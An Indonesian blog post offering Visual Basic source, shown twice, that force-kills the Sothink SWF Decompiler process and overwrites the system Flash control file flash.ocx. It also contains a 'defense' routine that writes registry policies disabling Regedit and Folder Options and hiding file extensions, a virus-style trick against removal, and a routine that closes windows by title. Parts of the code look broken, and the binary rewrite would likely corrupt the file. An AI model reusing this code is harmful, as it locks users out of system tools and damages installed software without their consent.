Menaklukan Sothink (Pembongkar Flash) dengan VB
'*************************Kode untuk membuka membuka kunci di Registry*****************************
Option Explicit
Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006
Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ' open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ' Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ' Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)
'////////////////////Deklarasi untuk Program Gasak//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10
'//////////////////Deklarasi untuk delete program/////////////////////////////////////////////////////
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
'//////////////////Deklarasi membaca file flash.ocx//////////////////////////////
Private Sign(4096) As String 'The Signatures will be loaded into this array
Dim keyinstal As String
Public Sub bacafileflash()
Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String
tik = """"
tuk = " & _"
keyinstal = ReadKey("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation")
sIn = FileText(keyinstal & "\Macromed\Flash\flash.ocx")
swords = Split(sIn, vbCrLf)
'ReDim Preserve swords(UBound(swords) - 1)
sIn = ""
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X
Exit Sub
err:
MsgBox "error when access file flash.ocx!" & vbCrLf & "maybe it corrupted" & vbCrLf & vbCrLf & "The error message was: " & err.Description, vbCritical + vbOKOnly, "Error"
End Sub
Public Function FileText(ByVal strfilename As String) As String
Dim handle As Long
handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle
End Function
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Public Sub DeleteKey(Value As String, Folder As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "Reg_Dword"
End Sub
Sub kodepertahanan()
'******************Menyembunyikan file yang mempunyai atibut hide*****************************
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", 2
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0
'//////////Non aktifkan folder option////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
'//////////Kunci Regedit////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
'////////menyembunyikan extensi file//////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
End Sub
Private Function Gasak(Opo As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
'EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0
End If
If InStr(UCase(T), UCase("")) > 0 Then
MsgBox "Si GASAK has been Disabled by The Creator!! Cheers!! ;)", vbInformation, "GASAK is shutting Down"
End
End If
'Shell "shutdown -a", vbHide '// jadi lambat kalo ini diaktifkan, pake cara lenm aja ya (API)...
End Function
'////////////////////////////Kode program Menghapus /////////////////////////////////////////
Sub Main()
Shell "Taskkill /F /IM SWFDecompiler.exe", vbHide
bacafileflash
FileCopy App.Path & "\flash.ocx", keyinstal & "\Macromed\Flash\flash.ocx"
DeleteFile App.Path & "\flash.ocx"
End Sub
'////////////////////////////Kode Baca Registri/////////////////////////////////////////
Public Function ReadKey(Value As String) As String
Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject("wscript.shell")
r = b.RegRead(Value)
ReadKey = r
End Function
'////////////////////////////Kode Buat File flash.ocx/////////////////////////////////////////
Public Sub Log(strLog As String)
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & "\flash.ocx" For Append As #ff
Print #ff, strLog
Close #ff
End Sub
Posted on 23.40 by aZi and filed under
Source Code
| 0 Comments »
Option Explicit
Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006
Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ' open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ' Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ' Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)
'////////////////////Deklarasi untuk Program Gasak//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10
'//////////////////Deklarasi untuk delete program/////////////////////////////////////////////////////
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
'//////////////////Deklarasi membaca file flash.ocx//////////////////////////////
Private Sign(4096) As String 'The Signatures will be loaded into this array
Dim keyinstal As String
Public Sub bacafileflash()
Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String
tik = """"
tuk = " & _"
keyinstal = ReadKey("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation")
sIn = FileText(keyinstal & "\Macromed\Flash\flash.ocx")
swords = Split(sIn, vbCrLf)
'ReDim Preserve swords(UBound(swords) - 1)
sIn = ""
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X
Exit Sub
err:
MsgBox "error when access file flash.ocx!" & vbCrLf & "maybe it corrupted" & vbCrLf & vbCrLf & "The error message was: " & err.Description, vbCritical + vbOKOnly, "Error"
End Sub
Public Function FileText(ByVal strfilename As String) As String
Dim handle As Long
handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle
End Function
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Public Sub DeleteKey(Value As String, Folder As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "Reg_Dword"
End Sub
Sub kodepertahanan()
'******************Menyembunyikan file yang mempunyai atibut hide*****************************
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", 2
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0
'//////////Non aktifkan folder option////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
'//////////Kunci Regedit////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
'////////menyembunyikan extensi file//////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
End Sub
Private Function Gasak(Opo As String)
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
'EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0
End If
If InStr(UCase(T), UCase("")) > 0 Then
MsgBox "Si GASAK has been Disabled by The Creator!! Cheers!! ;)", vbInformation, "GASAK is shutting Down"
End
End If
'Shell "shutdown -a", vbHide '// jadi lambat kalo ini diaktifkan, pake cara lenm aja ya (API)...
End Function
'////////////////////////////Kode program Menghapus /////////////////////////////////////////
Sub Main()
Shell "Taskkill /F /IM SWFDecompiler.exe", vbHide
bacafileflash
FileCopy App.Path & "\flash.ocx", keyinstal & "\Macromed\Flash\flash.ocx"
DeleteFile App.Path & "\flash.ocx"
End Sub
'////////////////////////////Kode Baca Registri/////////////////////////////////////////
Public Function ReadKey(Value As String) As String
Dim b As Object
Dim r
On Error Resume Next
Set b = CreateObject("wscript.shell")
r = b.RegRead(Value)
ReadKey = r
End Function
'////////////////////////////Kode Buat File flash.ocx/////////////////////////////////////////
Public Sub Log(strLog As String)
Dim ff As Integer
ff = FreeFile
On Error Resume Next
Open App.Path & "\flash.ocx" For Append As #ff
Print #ff, strLog
Close #ff
End Sub
Postingan
0 komentar:
Posting Komentar